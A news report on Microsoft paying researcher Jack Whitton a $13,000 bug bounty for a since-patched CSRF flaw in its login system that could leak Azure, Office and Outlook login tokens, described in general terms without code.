Microsoft awarded United Kingdom-based security researcher Jack Whitton a $13,000 bug bounty for unearthing a critical authentication flaw impacting Azure, Office and Outlook accounts.
Whitton details the attack on his blog post published on Sunday, April 3.
He says that the authentication system of Microsoft was susceptible to the so-called cross-site request forgery (CSRF) attacks, enabling hackers to harvest login token and pretend to be the actual user and compromise their data and accounts in the process.
"Despite CSRF bugs not having the same credibility as other bugs, when discovered in authentication systems their impact can be pretty large," says Whitton.
The newly uncovered security loophole bears similarity to a CSRF issue in Live.com that was unearthed by Wesley Wineberg, who is another security researcher at Synack Senior Security Research.
Between the two discovered vulnerabilities, the only difference is that Wineberg discovered a security issue that affected the protection mechanism of Microsoft's OAuth while Whitton unearthed a flaw that impacted the main authentication system of Microsoft.
Microsoft has a number of online services, like Azure and Outlook. Once users use these Microsoft services, they have to key in their personal credentials. A POST request is then sent out via the 'wreply' value in the domain's address with the login token. To log the user in, the token is used and consumed.
Whitton explains that the URL provided by Microsoft is open to CSRF attacks. This kind of attack enables hackers to generate a malicious URL. As soon as this malicious URL is accessed by the user, who is already authenticated, the login token would then be sent to the hacker's server, thereby causing a cross-site forgery attack.
The researcher underscores that the token is only applicable for a particular service that issued it.
"[A]n Outlook token cannot be used for Azure, for example," he explains. "But it'd be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way."
It took Microsoft 48 hours to patch the crucial authentication flaw after it was reported on Jan. 24. The issue was acknowledged by Microsoft at the end of that day. By Jan. 26, the company was able to fully patch up the bug.
The awarded money is part of the company's bug bounty program.